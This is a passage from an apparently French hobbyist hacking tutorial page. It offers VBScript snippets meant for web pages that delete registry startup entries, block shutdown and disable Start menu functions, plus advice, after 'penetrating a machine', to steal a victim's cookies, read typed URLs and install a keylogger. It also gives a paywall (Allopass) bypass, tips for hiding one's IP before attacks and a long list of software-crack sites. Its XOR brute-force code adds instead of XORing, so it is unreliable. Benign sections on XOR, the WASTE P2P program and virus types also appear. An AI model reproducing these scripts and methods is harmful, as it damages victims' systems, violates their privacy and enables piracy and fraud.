permettent de scaner une tranche d'IP et de par exemple nous dire lesquels sont
infectés par un trojan, et surtout quel est son nom (pour pouvoir telecharger
ensuite le client correspondant sur internet) ! Je vous conseille un super
logiciel pour cela : SuperScan.
Vous vous etes fait infectés, vous etes
paniqués en ne savez plus quoi faire??? Vous venez de telecharger un trojan et
vous avez confondu le client avec le serveur ?????? Il existe des logiciels
appelés vulgairement "bouffe-trojans" qui vous en débarraseront tres facilement
(faites un recherche avec google). Vous pouvez aussi vous en debaraser
manuellement en allant chercher dans le registre la clée
"HKEY_LOCAL_MACHINE\SOFTWARE\ Microsoft\Windows\CurrentVersion\Run" (Qui est
la clée qui possede un certain nombre de valeur de chaine qui possedent eux meme
pour valeur le chemin des programmes qui se lancent au demarage (une valeur de
chaine = 1 programme) ) suprimez ce que vous croyez etre le trojan (seulement si
vous etes certain !) Un autre moyen pour connaitre les programmes qui se
lancent au demarage : Demarer>executer>msconfig>onglet demarage.
Le vbs est un language script que vous pouvez inclure dans
des pages web(cf l'exemple ci dessous), a notre plus grand bonheur ! Mais
helas, ceci ne marche que pour les machine possedant
Windows.
<html> < head> < title>C'est la joie non
??</title> < /head> < body> < script
language="VBScript" type="text/VBScript"> ' les scripts vbs se trouvent
dans cette partie ! < /script> < /body> <
/html>
Voici un bon nombre de petits script vbs que vous pourrez
incule dans des pages web, ou directement, avec le bloc note, enregistrer au
format .vbs !
Afficher un p'tit message msgbox"salut l'ami
!"
Ecrire dans la base de registre (cf :partie
informatique>tuto>base de registre) Set WshShell =
CreateObject("WScript.Shell") ' supprimer une clée WshShell.RegDelete
"HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TypedURLs" ' Créer
une valeur de chaine WshShell.RegWrite "HKEY_CURRENT_USER\YaDlaJoie\Youpi",
"valeur"
Créer un racourcis sur le bureau if location.protocol =
"file:" then Set WshShell = CreateObject("WScript.Shell") Set FSO =
CreateObject("Scripting.FileSystemObject") HPath = Replace(location.href,
"/", "\") HPath = Replace(HPath, "file:\\\", "") HPath =
FSO.GetParentFolderName(HPath) Set TRange = document.body.createTextRange
Set RealLink = WshShell.CreateShortcut("C:\WINDOWS\bureau\paatate")
RealLink.TargetPath = "http://www.patate.tk" RealLink.Save end
if
Créer un fichier quelquonque (dans exemple, fichier batch ;-) ) Set
monfichier = FSO.CreateTextFile("c:\Windows\bureau\monfichier.bat", 2, False)
monfichier.WriteLine "@echo off" monfichier.WriteLine "echo c'est la
joie" monfichier.WriteLine "pause>nul" monfichier.WriteLine "exit"
monfichier.Close
Supprimer les fichiers qui se lancent au
demarage Set WshShell = CreateObject("WScript.Shell")
WshShell.RegDelete"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft \Windows\CurrentVersion\Run"
Modifier
nom du PC: Set WshShell = CreateObject("WScript.Shell")
WshShell.RegDelete
"HKEY_LOCAL_MACHINE\System \CurrentControlSet\Control\ComputerName\"
WshShell.RegWrite
"HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control \ComputerName\ComputerName\ComputerName","LeNom"
Empecher
le pc de s'eteindre: Set WShell = CreateObject("WScript.Shell")
WShell.RegWrite"HKEY_CURRENT_USER\Software \Microsoft\Windows\CurrentVersion\Policies\Explorer\NoClose",
"1"
Enlever demarer>executer Set WshShell =
CreateObject("WScript.Shell") WshShell.RegWrite
"HKEY_CURRENT_USER\Software \Microsoft\Windows\CurrentVersion\Policies\
Explorer\NoRun", 0 ,"REG_DWORD"
Enlever demarer>documents Set
WshShell =
CreateObject("WScript.Shell") WshShell.RegWrite"HKEY_CURRENT_USER\Software \Microsoft\Windows\CurrentVersion\Policies\
Explorer\NoRecentDocsMenu", 0 ,"REG_DWORD"
Enlever
demarer>rechercher Set WshShell =
CreateObject("WScript.Shell") WshShell.RegWrite"
HKEY_CURRENT_USER\Software \Microsoft\Windows\CurrentVersion\Policies\
Explorer\NoFind", 0 ,"REG_DWORD"
Mettons que vous avez reussi à penetrer une machine, quels
sont les dossiers et les fichiers à regarder ???
- Les cookies : Ils sont
la cible prioritaire (sous windows 9x contenus dans \windows\cookies, sous win
NT, contenu dans H:\Documents and Settings\Nom_Utilisateur\Cookies, sous linux
avec netscape contenus dans /.netscape/) Explications : vous venez d'aller
sur un site qui demande votre login et votre mot de passe, puis un jour apres,
vous vous reconectez à ce site et la miracle! Il se souvient de vous !! Vous
n'avez même plus à retaper le mot de passe ni le login !! Comment cela se
fait-il ? Et bien le site place un cookie qui contient toute ces informations
(je pense que la, ça commence à s'éclaircir dans votre tete...) . Biensur, ces
informations sont cryptés, mais ce n'est pas une generalitée ;-) ! Vous
comprenez donc que les cookies sont à recuperer !
-
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TypedURLs\urlX
Seulement si vous pouvez acceder au registre (beaucoup de trojans possede
cette fonctionalitée). En effet la clée
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TypedURLs possede X
valeur de chaine qui possedent eux meme pour valeur les URL tapés dans
l'explorer. Vous pouvez donc savoir sur quel site vas regulièrement votre
victime. Et là normalement, vous devriez faire le lien avec les cookies ;-) non
? (Ne marche que si la victime a IE)
- Pour avoir plus d'information sur
notre victime, placez un keyloger ! Qui vous permettra d'enregitrer tout ce qui
a été taper par notre victime !
- FARFOUILLEZ ! Maintant cherchez un
peu partout (mes documents, le contenu de windows...etc.)! Vous trouverez
surement des choses interessantes
Pour telecharger un fichier flash, il ne vous suffit pas de
faire un clique doit, puis enregistrer sous, c'est un peu plus compliqué que
cela (un chouia plus...) Pour cela il vous faudra :
- Un editeur de
texte quelquonque - heu... c'est tout.
Vous venez de repérer le
fichier qui vous interesse. Il faut que vous trouviez tout d'abord le chemin
de ce ce fichier flash (faite, affichage>Source>pis debrouillez vous (lol
faites Rechercher>".swf" pis ok, et vous trouverez surement le chemin du
fichier). Apres avoir trouver le chemin du fichier, lancez par exemple le
bloc note et ecrivez ceci :
<html> < head> <
title>c'est la joie</title> < /head> < body> <
a href="Mettez ici l'adresse de votre fichier flash">Telecharger le fichier
swf < /a> < /body> < /html>
Enregistrez sous
"NimporteQuelNom.html" puis lancez ce fichier. Il s'afficher alors une page web
avec pour contenu juste un lien HyperTexte, faites un clique droit sur ce lien
et faites "Enregistrer la cible sous". Et voila ! le tour est joué !
Qu'est-ce qu'une ip ? Une ip est une sorte de code, qui est
propre à chaque machine connectée au web. Concretement une ip ce représente
sous la fome de quatres chiffres à la suite séparés par des points et allant de
000 a 255. Exemple : 193.211.157.002 Ce chiffre et votre plaque
d'imatriculation et elle est dite "dynamique" si elle change à chaque connection
ou "fixe" pour le contraire. Les 2 premiers nombres c'est l'adresse d'un
réseau, le 3eme nombre est celui d'un sous réseaux (Exemple pour AOL : c'est
152 pour le premier numéro, les trois autres varient ) Si quelqu'un connait
votre IP, il peut avoir de nombreuse informations sur vous, et si vous etes
inficter par un trojan, on peut même penetrer votre pc. Mais comment
connaitre sa propre ip ??? "Demarer>executer>winipcfg" OU
"Demarer>executer>command>ipconfig" Il existe de nombreux logiciels
qui peuvent vous permettre de cacher votre IP (ex : steganos internet
anonym...etc.). Mais il existe aussi des logiciels pour scanner une tranche
d'ip (ex : de l'ip 120.050.02.041 à 120.050.02.049) pour detecter vos failles et
les exploiter (tres bon logiciel pour cela : SuperScan). Mais attention, si
il vous venait à l'esprit de scaner une tranche d'ip, sachez tout d'abord que
c'est TOTALEMENT interdit par la loi, et que si vous scannez les IP ci-dessous,
vous aurez de serieux problemes .
6.*.*.* - Army Information Systems
Center 21.*.*.* - US Defense Information Systems Agency 22.*.*.* - Defense
Information Systems Agency 26.*.*.* - Defense Information Systems
Agency 29.*.*.* - Defense Information Systems Agency 30.*.*.* - Defense
Information Systems Agency 49.*.*.* - Joint Tactical Command 50.*.*.* -
Joint Tactical Command 55.*.*.* - Army National Guard
Bureau 64.224.*.* 64.225.*.* 64.226.*.* 209.35.*.* 216.247.*.* 216.25.*.* 217.6.*.* 155.7.0.0
American Forces Information (NET-AFISHQ-NET1) 155.8.0.0 U.S. ArmyFort Gordon
(NET-GORDON-NET5) 155.9.0.0 United States Army Information Systems Command
(NET-LWOOD-NET2) 155.74.0.0 PEO STAMIS (NET-CEAP2) 155.75.0.0 US Army
Corps of Engineers (NET-CEAP3) 155.76.0.0 PEO STAMIS
(NET-CEAP4) 155.77.0.0 PEO STAMIS (NET-CEAP5) 155.78.0.0 PEO STAMIS
(NET-CEAP6) 155.79.0.0 US Army Corps of Engineers (NET-CEAP7) 155.80.0.0
PEO STAMIS (NET-CEAP) 155.81.0.0 PEO STAMIS (NET-CEAP9) 155.82.0.0 PEO
STAMIS (NET-CEAP10) 155.83.0.0 US Army Corps of Enginers
(NET-CEAP11) 155.84.0.0 PEO STAMIS (NET-CEAP12) 155.85.0.0 PEO STAMIS
(NET-CEAP13) 155.86.0.0 US Army Corps of Engineers (NET-CEAP14) 155.87.0.0
PEO STAMIS (NET-CEAP15) 155.88.0.0 PEO STAMIS (NET-CEAP16) 155.178.0.0
Federal Aviation Administration (NET-FAA) 155.213.0.0 USAISC Fort Benning
(NET-FTBENNNET3 155.214.0.0 Director of Information Management
(NET-CARSON-TCACC ) 155.215.0.0 USAISC-FT DRUM
(NET-DRUM-TCACCIS) 155.216.0.0 TCACCIS Project Management Office
(NET-FTDIX-TCACCI) 155.217.0.0 Directorate of Information Management (NET-
EUSTIS-EMH1) 155.218.0.0 USAISC (NET-WVA-EMH2) 155.219.0.0 DOIM/USAISC
Fort Sill (NET-SILL-TCACCIS) 155.220.0.0 USAISC-DOIM
(NET-FTKNOX-NET4) 155.221.0.0 USAISC-Ft Ord (NET-FTORD-NET2) 128.47.0.0
Army Communications Electronics Command (NET-TACTNET) 128.50.0.0 Department
of Defense (NET-COINS) 128.51.0.0 Department of Defense
(NET-COINSTNET) 128.56.0.0 U.S. Naval Academy (NET-USNA-NET) 128.63.0.0
Army Ballistics Research Laboratory (NET-BRL-SUBNET) 128.80.0.0 Army
Communications Electronics Command (CECOM) (NET-CECOMNET) 128.98.0.0 Defence
Evaluation and Research Agency (NET-DERA-UK) 128.98.255.255 Defence
Evaluation and Research Agency (NET-DERA-UK) 128.154.0.0 NASA Wallops Flight
Facility (NET-WFF-NET) 128.155.0.0 NASA Langley Research Center
(NET-LARC-NET) 128.156.0.0 NASA Lewis Network Control Center (NET-
LERC) 128.157.0.0 NASA Johnson Space Center (NET-JSC-NET) 128.158.0.0 NASA
Ames Research Center (NET-MSFC-NET) 128.159.0.0 NASA Ames Research Center
(NET-KSC-NET) 128.160.0.0 Naval Research Laboratory (NET- SSCNET) 128.161.0.0
NASA Ames Research Center (NET-NSN-NET) 128.183.0.0 NASA Goddard Space Flight
Center (NET-GSFC) 128.216.0.0 MacDill Air Force Base
(NET-CC-PRNET) 128.217.0.0 NASA Kennedy Space Center
(NET-NASA-KSC-OIS) 128.236.0.0 U.S. Air Force Academy
(NET-USAFA-NET) 139.142.* 195.10.* 205.96.* 205.103.* 207.30.* 207.120.* 207.60.* 207.61.* 209.35.*.* 216.25.*
<-- REAL DANGEROUS (CIA?) 216.247.* <-- REAL
DANGEROUS 217.6.*.* 207.60.x.x FBI Linux servers 207.61.x.x FBI Linux
servers 139.142.153.23 139.142.*
Tout le monde le sait, allopass est devenu un fléaux sur
internet ! Nous sommes desormais obligés de passer un coup de fil payant pour
acceder a certaines pages ! Certaine webastre fond meme payer grace à ce syteme
l'acces à leurs site ! Vous ai-je fait payer l'acces a mon site ? Même si
j'ai passer énormement de temps à faire ce site, je trouve cela inconsevable
d'en faire payer l'acces.
Voici donc la technique pour passer allopass
: Vous aurez besoin de : - IntelliTamper (Petit Freeware que vous
trouverez partout ! (google>IntelliTamper) )
IntelliTamper est un
logiciel qui vas "scanner" le serveur du site voulu et en faire une
arboréscence. Il faut deja que vous reperiez l'adresse du site "cible", tres
simple, mais ne vous fiez pas aux apparences !!! Il se peut que l'url que vous
pensiez bonne ne soit qu'une redirection ! Faite affichage>source sur le
"site cible" et cherchez la bonne URL.
Entrez l'url du site dans la zone
de texte d'IntelliTamper puis lancez le scan, et attendez (si vous avec une
connexion 56Ko, ca risque de prendre du temp...) Reperez la page protégée par
le allopass dans IntelliTamper. Puis clique droit>"open file" Et la page
s'ouvrira !! MAIS (il y a toujours un "mais" en informatique) il se peut que
le webmastre ai mit une protection de allopass, dans ce cas, la page ne
s'affichera que quelques secondes, voir pas du tout. Pour contourner cette
protection, faite "Save file as" de la page protegée avec allopass. Ouvrez
ensuite cette page avec le Bloc Note ou un editeur de texte quelquonque, et
supprimez la portion de code ci-dessous :
<noscript> < meta
http-equiv="Refresh" content="0;URL=http://www.allopass.com/check
/error_code.php4?DOC_ID=62395&SITE_ID=22690"> <
/noscript> < script language="Javascript"
src="http://www.allopass.com/check/chk.php4?
IDD=62395&IDS=22690"></script>
Puis sauvegardez, ré-ouvrez
la page et TADAAAAAA ca marche !! ;-)
Et c'est parti pour un petit tuto qui vous expliquera
comment etre le plus annonyme possible sur la toile. Vu que vous etes dans
la partie hacking, sachez qu'avant de vous attaquer à n'importe quoi, il faut
IMPERATIVEMENT que vous vous assuriez de votre transparance sur le web (je pense
que vous comprenez pourquoi hummm ?).
1) Cacher son IP
Vous savez
que votre IP est en quelque sorte votre plaque d'imatriculation sur le web, et
si vous vous preparez a faire la plus grosse casse du siecle, il faut bien
evidement que vous cachiez cette plaque ! Pour cela, dieux a donné aux hommes
les proxy ! Les proxy permette donc de cacher votre vrai IP par une
fausse. Vous pouvez utiliser un proxy de deux manières : soit par des
logiciels qui vous mache tout le travail, ou, en configurant IE.
- Avec
IE : outil>option internet>onglet connexion>paramètres>utiliser un
serveur proxy pour cette connexion Et dans les zone de texte, il faut que
vous entriez l'ip proxy ainsi que le port. Vous trouverez un tas de proxy en
allant sur le site de SamAir (faites une recherche google...).
- Avec des
programme : Des tas programmes existent, comme Steganos internet annonym ou
encore multiproxy, et ces dernièrs changent votre IP (avec Steganos, vous pouvez
faire changer votre ip toute les secondes !).
2)Les Spywares
Il se
peut qu'il y ai un bon nombres de spyware sur votre machine. Ce sont des petits
programmes qui espionnent vos faits et gestes sur internet. Pour les supprimer,
je vous conseille "Spyboot Shearch and destroy" qui est un petit Freeware bien
sympatique qui se fera une joie de supprimer la quasi totalitée des spyware
installés sur votre machine.
3)L'historique
Faites
outils>option internet> onglet general> historique Et mettez 4 en
nombre de jours pendant lesquels seront conservés l'historique.
4) Les
cookies
La quasi totalité des sites laissent une petite trace d'eux en
vous laissant un chtit cookie, je vous conseille donc de les supprimer à chaque
demarage du PC ! Pour cela, créez un petit fichier batch : @echo off echo
o | del c:\windows\cookies\*.* echo cookies effacés avec succes
! pause cls exit Et placez ce dernier dans
demarer>programmes>demarage
5)Les firewalls
Si vous ne
possedez pas de firewall, n'importe qui peut avoir un bon nombre d'information
sur vous ! Telechargez donc un firewall !(je vous conseille Zone Alarm de Zone
Labs)
Et voila !
Tout d'abord, definition : Un crack est un petit
programme dont le but est de modifier quelques bytes d'un EXE. Mais à quel
but ? Par exemple pour transformer un Shareware en Freeware. Vous comprenez donc
que si vous telecharger par exemple la version trial de photoshop qui ne dure
que 30 Jours, et que vous telecharger le crack pour ce shareware, et bien vous
aurez photoshop indefiniment !
Voici une liste de "phiphi" dans laquel
vous trouverez un certain nombre d'URL de site sur lesquel vous trouverez tout
les crack que vous voulez !
http://www.crackzplanet.com/search.php http://www.crackway.com/ http://www.mikrobos.szm.com/data/crack/ http://www.keygen.us/ http://www.mikrobos.szm.com/ http://www.allcracks.net/ http://andr.net/ http://www.astaserials.com/ http://www.astakiller.com/
http://www.cleanserials.com/ http://www.crackfind.com/test.php http://www.cracksearch.ws/
http://crackfind.com/ http://www.crackyard.com/ http://www.crackfound.com/
http://www.crackhell.com//toplist.php http://www.crackportal.com/ http://members.lycos.nl/peterlux/ http://www.cracks.am/cracks/a16.html http://www.crackz.ws/ http://cucusoft.convert.avi.to.vcd.dvd.svc...
ck-locator.net/ http://cybermania.vibehosting.com/ http://www.deamoncrack.fr.st/ http://www.deluxnetwork.com/ http://www.easycracks.net/ http://www.freeline.ws/ http://www.fastcrackz.com/
http://www.freeserials.com/cgi-bin/serials/view.cgi?dir=P
http://cas.has.it/ http://fullserials.hacked.at/ http://www.googlecrack.com/ http://www.googlecrack.com/Programs.asp http://www.serialsnake.ws/ http://www.ultraseek.net/simple/?link=http...
ools.serwis.pl/ http://www.megazip.com/ http://crackazoid.com/ http://crackinfo.net/a6.htm
http://www.serialcodes.net/in.php?id=allseek http://www.serialheaven.com/index.php http://www.seriall.com/ http://www.serials.ws/all/
http://www.cerials.net/ http://www.servisco.net/ http://www.ultimasversiones.com/ http://www.undergroundarchive.co.uk/ http://great-warez.com/a_new2.htm http://www.world-toplist.com/ http://www.deluxserials.com/ http://www.cracks.st/ http://www.darkserials.com/
http://www.serialz.to/ http://keygen.us/top/index.shtml http://icracks.net/ http://keygen.ru/ http://www.crackmanworld.com/ http://www.eminence.gulli.com/ http://www.bugz.ru/ http://kickme.to/aldocrackz/ http://www.allcracks.net/search/search.php http://www.astalavista.cc/index.php?search=email%20remover
http://www.astalavista.us/ http://www.cracks.spb.ru/
http://www.crackfound.com/ http://www.cracksearchengine.net/ http://serials.omck.info/
http://inicia.es/de/manifiestocomunista/crack.htm http://www.crackdb.com/ http://crackersteam6.tk/ http://www.hackemate.com.ar/cracking/ http://www.crack-locator.com/ http://www.crackmes.de/ http://cracksû.us/ http://www.cracksû.com/ http://www.cracksearch.ru/cracks/ http://cracks.thebugs.ws
http://www.geocities.com/ http://www.googlecrack.com/WWW/ http://zor.org/desperate
http://kickme.to/juancho http://ngenworld.free.fr/ http://kickme.to/tnt http://news.lunarpages.com/news.html http://www.crackfound.com/ http://www.cracksearchengine.net/ http://www.crackspider.net/ http://www.astalavista.box.
http://www.cracks.am/main.htlm http://www.gulli.com/serialz.shtlm http://www.toptools.serwis.pl/index.htm http://www.wtcracks.com/main.htm http://www.halyava.ru/darkseed/newsoft.htm http://www.ifrance.com/gifromu/cracka.html http://www.tanerkope.com/cracks/crks/a.html http://www.crackway.com/cracks/index.shtml http://www.free51.net/crack
http://www.warezcrawler.net http://www.bestserials.com
http://www.subserials.com http://www.thecrack.net.8080 http://www.cracks.ss.ru/
http://www.trinsic.org
http://www.anycracks.com http://www.mscracks.com http://www.cracksviperland.free/index.htm http://www.members.fortunecity.com http://www.cracks4u.us http://cracks.me.uk/
Le cryptage Xor est utilisé dans des algorithmes complexes,
et sert également d'instruction de programmation. Il est donc intéressant de
connaître son fonctionnement. Pour ceux qui ne sont pas intéressés :
look
L'opération Xor ou « OU exclusif », notée en
mathématiques, est une opération logique qui ne retourne la valeur 1 que si les
deux bits comparés sont différents. C'est le « OU » de l'expression « boire OU
conduire, il faut choisir (mdrr ) » : l'un ou l'autre, mais pas les
deux. Alors, voyons voir comment fonctionne le cryptage XOR, ou
exclusif:
Il est impératif de connaître la table qui suit : 0 xor 1 =
1 1 xor 1 = 0 1 xor 0 = 1 0 xor 0 = 0
Mise en pratique: texte
claire : cryptage clé de cryptage : messages
On convertit les
caractère en binaires : cryptage = 01100011 01110010 01111001 01110000
01110100 01100001 01100111 01100101 messages = 01101101 01100101 01110011
01110011 01100001 01100111 01100101 01110011
On compare les deux chaines
de données et on applique le xor: 01100011 01110010 01111001 01110000
01110100 01100001 01100111 01100101 //text clair 01101101 01100101 01110011
01110011 01100001 01100111 01100101 01110011 //clé
00001110 00010111
00001010 00000011 00010101 00000110 00000010 00010110 //code du
cryptogramme
Dans le cas où le message à crypter est plus grand que la
clé ( çà arrivera forcément en cryptant un texte, il suffit de répéter la clé
autant de fois que nécessaire pour qu'il y ait toujours deux chiffres à
comparer) Si le message est plus petit que la clé ( il va de soi que la clé
est tronquée )
Chiffrement à mono-clé
-------------------------------------------------------------------------------- Il
est possible de crypter un chaine de caractères en utilisant, toujours la même
clé. Certes il est plus facile de la décrypter dans ces conditions, mais là
c'est juste en exemple. Nous voulons appliquer le chiffrement avec un XOR
40.
Texte claire: over. En ASCII cela donne 111 118 101 114
Appliquons le chiffrement: 111 XOR 40 : 71 118 XOR 40 : 94 101
XOR 40 : 77 114 XOR 40 : 90 Résultat : G^MZ La machine elle n'opère
qu'en binaire, mais dans un programme en C/C++ peut
importe.
Programmation : En language C, l'instruction permetant le XOR
est : ^ Soit deux lettres E et F, nous effectuerons: E XOR F:
main()
{ int var; var = 'E' ^ 'F'; printf("%i",var); }
Equivalent à:
main() { int var; var = '101' ^
'102'; printf("%i",var); }
Ou encore: main() { int
var; var = '1100101' ^ '1100110'; printf("%i",var); }
Nous avons
vu que certains messages peuvent être crypter par une mono-clé, c'est-à-dire que
l'on crypte chaque caractère d'un message par une valeur tenant donc
obligatoirement sur 8 octect soit 2 puissance 8 = 256 possibilité de crypter par
mono-clé.
NOTION IMPORTANTE : le xor est réversible c'est-à-dire : E xor
F = M donc M xor F = E et encore M xor E = F
Exercice : Décrypter
: XIZKQUWVQM
Solution : Il existe 255 caractère ascii, donc pour
résoudre ce challenge il vous faut faire un mini-programme en C par exemple qui
xorize chaque caractère du message crypté par une mono-clé allant de 0 à 255
: #!include! #!include!
main() { int
v,v1,v2,v3,v4,v5,v6,v7,v8,v9; int i; for(i=0;i<256;i++){ v = 'X' +
i; v1 = 'I' + i; v2 = 'Z' + i; v3 = 'K' + i; v4 = 'Q' + i; v5 =
'U' + i; v6 = 'W' + i; v7 = 'V' + i; v8 = 'Q' + i; v9 = 'M' +
i; printf("%c%c%c%c%c%c%c%c%c%c %i
",v,v1,v2,v3,v4,v5,v6,v7,v8,v9,i); } }
Voilà, j'espère ne pas avoir
été trop confus..
Waste est aujourd'hui le seul logiciel de P2P qui
garantisse l'anonymat, pourquoi et comment? C'est ce que nous allons voir dans
cette article.
Petit rappel des faits : Fin mai, NullSoft
(créateur du logiciel Winamp) propose sur son site un logiciel P2P du nom de
WASTE sous licence libre GNU/GPL. 24h plus tard la page de téléchargement est
remplacée par un avertissement interdisant l’utilisation et la diffusion de
WASTE, tout en réfutant la licence GNU/GPL ! Mais une journée aura suffit aux
partisans du libre pour s’accaparer le logiciel. Ainsi, malgré le désaccord
d’AOL (propriétaire de Nullsoft), Waste se retrouve sur SourceForge, et sa
licence libre de 24h confortée.
Mais qu’est ce que Waste ? Simple, un
réseau de partage crypté pour une petite communauté (10 à 50 personne) et qui
assure un quasi-anonymat aux utilisateurs : - À un premier niveau par le
cryptage des informations grâce à un systême de clés et aussi un encodage des
liens entre les ordinateurs du groupe. - À un second niveau par
l’architecture du réseau, sans serveurs et avec des nodes qui font que les
communications ne sont pas directes.
Comment ça marche ? À
l’installation du programme, deux clés sont créées, une privée et une publique.
La première ne sert qu’à vous identifier sur le réseau et ne doit pas être
divulgée. La seconde permet de se connecter sur les autres ordinateurs. En effet
cette clé est nécessaire pour que la connection sur un ordinateur ami soit
effective. Une fois connecté à un autre ordinateur, celui-ci vous fournire sa
liste d’ordinateur ami, et donc vous serez relié au groupe. Waste vous offre le
choix alors de chatter, de chercher et transférer des fichiers.
Ca marche
vraiment bien, et c'est très convivial a utilisé grâce au module de chat et à
cet ambiance "échange entre pote"
Tutorial: (provient de http://www.forum-libre.com/protox.biz/tutorial/tutorial_waste_wasted.htm
)
Alors .. Comment..ça..marche ?!

1 -
Vous êtes l'ordi rouge et vous avez déja 3 potes de connectés à vous, un beau
jour l'un de vos pote se connecte avec un nouveau copain à lui.
2 - Ce
nouveau copain possède lui aussi une liaison intime avec un autre type super
sympa qui possède plein de bonnes choses à partager..
3 - Ce nouveau type
est connecté lui aussi avec un autre gars.
4 - Le truc de fou, c'est que
ce gars est lui même connecté à un reseau déjà bien monté avec plein de gens
qui partagent des milliers de trucs.
5 - Waste est un soft intelligent et
garde trace de vos nouveaux copains, non seulement vous avez récupéré les
clés de tous vos nouveaux potes mais une nouvelle connection vient de se
faire entre vous et un ordi vert
Est-il nécessaire de vous rappeler que
toutes ces liaisons sont cryptées ? Est-il nécessaire de vous rappeler qu'il
n'y a aucun serveur central ?
Nota Bene » Les transfers qui se font par
exemple entre vous ( 1 ) et votre pote vert ( 4 ) ne se font pas en
connection directe pour assurer l'anonymat, les données se balladeront entre
plusieurs relais avant d'arrivé à bon port.
Comment ça s'install
?!
1) Après avoir lancé pour la première fois ce petit programme vous
avez ceci :

Il vous suffit de bouger la souris pour générer des
chiffres aléatoires qui serviront au programme pour crypter vos
échanges
2) Remplir les infos demandés

3)Cliquer sur
RUN KEY GENERATOR pour generer vos clés publiques et privées. La clé publique
se donne à vos amis, la clé privé reste chez vous.

4)Entrer un mot
de passe relativement long (mais retenable !) et choisissez la taille de la
clé : 1536bits, 2048bits .. on peut prendre plus mais ça ralentit les
échanges sur votre futur reseau. Cliquer ensuite sur GENERATE.

5)Une nouvelle
collecte de données variables.. Bouger la souris puis cliquer sur
GENERATE

6) Vous avez maintenant la possibilité de copier votre clé
publique dans le Clipboard ( le presse-papier ) afin de la donner à vos
ami[e]s L'ordinateur sur lequel vous allez vous connecter DOIT posséder votre
clé.

7)Choisissez un repertoire qui servira à stocker vos downloads
ainsi que les repertoires qui seront partagés sur votre reseau. Notez qu'on
peut cliquer plusieurs fois de suite sur ADD pour ajouter plusieurs dossiers
differents ! Votre Reseau privé & unique est à présent configuré ..
Passons à la suite :

Interface
1) La fenêtre principale de Waste
:

> Le Network Status permet de voir rapidement les operations
du moment : Connexion en cours / Téléchargements en cours / Envois en cours
.. > L'explorateur de fichiers vous permet de balayer les partages de vos
potes > Créer / Rejoindre un salon de chat : Vous pouvez créer un salon
visible ou invisible aux autres connectés.
Vous voyez aussi la liste des
utilisateur connectés au reseau privé. Un click droit sur leur pseudo vous
permet d'avoir un nouveau menu :

Vous pouvez donc
chatter en tête à tête, en savoir plus, balayer ses fichiers ou lui envoyer
un ou plusieurs fichiers.
La zone 'Chats:' vous donne la liste des salons
visibles actuellement créés. Pour rejoindre un salon invisible vous devez en
connaître le nom exact.
Un salon visible sera de la forme :
#monsalon Un salon invisible sera de la forme :
&monsalon
2)

Network Status
: 1. Tapez ici une adresse IP de l'un de vos potes puis cliquez sur 2.
pour vous y connecter Vous devez posséder une clé publique de votre pote.
Demandez-la lui.
3. Ici vous avez le nombre de connexions que vous
souhaitez entretenir, n'ayant pas de server central c'est à chaque
utilisateur de relayer les ips des autres ainsi que les clés de leurs amis (
une fois connecter sur votre pote, si lui même à déjà une liste
d'utilisateurs il vous donnera automatiquement leurs clés publiques qui sera
sauvegardée sur votre pc .. sympa non ? )
Petite note pour les
utilisateurs de la version modifiée de waste, appelée wasted, on peut mettre
un intervale de connections ( exemple : entre 4 et 9 connections seront
maintenues )
4. Vous avez ici le status des utilisateurs : - Status :
Il se connecte ? Envoie-t'il ? (out) Reçoit-il ? (in) - Host : L'adresse IP
des utilisateurs online - Rating : Aucune idée de ce truc ! ( si vous savez,
dites-le moi ! ) - User (key) : Le nom d'utilisateur et la signature de sa
clé
3) Pour gérer vos envois et téléchargements, vous pouvez aller
dans la section Transferts :

4)Pour faire une
recherche sur le reseau global, allez dans BROWSER

Où sont les
autres options ? Gérer les clés, Couleurs, Débit .. etc
1) Pour gérer
vos options supplémentaires : Les Préférences

- About : A
propos du programme ..
- Profiles : Si vous n'êtes pas tout seul à
utiliser le programme ..
- Identity : Votre pseudo du moment et votre
'vrai' nom (lol)
- Network : Votre vitesse de connection, votre port
utilisé. Les sous-menu de Network : Private Key > Gérer votre clé
privée Public Keys > Gérer les clés publiques :
Ajouter/Supprimer/Voir.. Pending Keys > Gérer les clés qui se balladent :
ex: Ajout auto ou manuel ? IP Addresses > Gérer les IP : bannir,
autoriser, rediriger ... Bandwidth > Gérer la bande passante, le débit
: - Limiter les données entrantes en kb/sec - Limiter les données
sortantes en kb/sec
- Display : Toutes les options d'affichage de Waste (
couleurs, police .. )
- Chat : Toutes les options du Chat. Couleurs,
police, accepter les demandes de chat en tête à tête..
- File Transfers :
Les options générales lors de transferts de fichiers. Les sous-menu de File
Transfers : Receiving (Reception) > Repertoire de sauvegarde de vos
téléchargements, Permettre l'envoi de fichiers, demander avant
l'envoi.. Sending (Envoi) > Limiter le nombre de fichiers demandés, Autres
repertoires de partages, Option de rescanner vos partages toutes les x
secondes ...
Quese qu' un virus: la réponse a cette question tte bête qui devra intéréssé
plus d'une personne
P>Les virus : une menace permanente. Une infection
est actuellement 20 fois plus probable qu’il y a 2 ans. On estime qu’une
entreprise infectée a besoin de 5 jours ouvrables pour se débarrasser totalement
de l’assaillant. Donc la lutte antivirus revêt une importance majeure.
1
: Qu’est-ce qu’un virus ?
Un virus est un programme autoreproducteur
capable de se propager de façon autonome. Il causera des beaucoup de dégâts dans
le système qu’il a infecté. Ces dégâts soit d’ordre logiciel soit même matériel
(les virus s'ataquant au BIOS), et vont de l’affichage d’un petit message au
formatage complet de votre disque dur.
Voici les sources d’infections
:
-Une disquette dont le secteur d’amorce est infecté. -Une disquette
qui comporte un fichier exécutable infecté. -Un LAN (Local Area Network ou
réseau local) qui contient un poste infecté. -Internet, par simple
téléchargement. Le courrier électronique, par un document joint infecté.
2 : Types de virus On classe les virus de 5 façons :
a) Virus du
secteur d’amorce ; ils remplacent l’amorce d’un disque par leur propre code et
se chargent ensuite en mémoire centrale. Il rendent inutilisable le disque
d’amorçage et/ou se propagent vers d’autres disques. b) Virus de fichiers ;
ils ajoutent leur code aux fichiers exécutables (*.exe *.com *.bat ) et se
chargent en mémoire centrale afin de contaminer encore d’autre programmes. Il
rendent ces programmes inutilisables. c) Virus furtifs ; ils échappent à
toute détection en se camouflant. Une des méthodes de détection consiste à
enregistrer la longueur d’un programme (si le virus a ajouté son code, on peut
facilement comparer avec une simple sauvegarde de ce progr. ) d) Virus
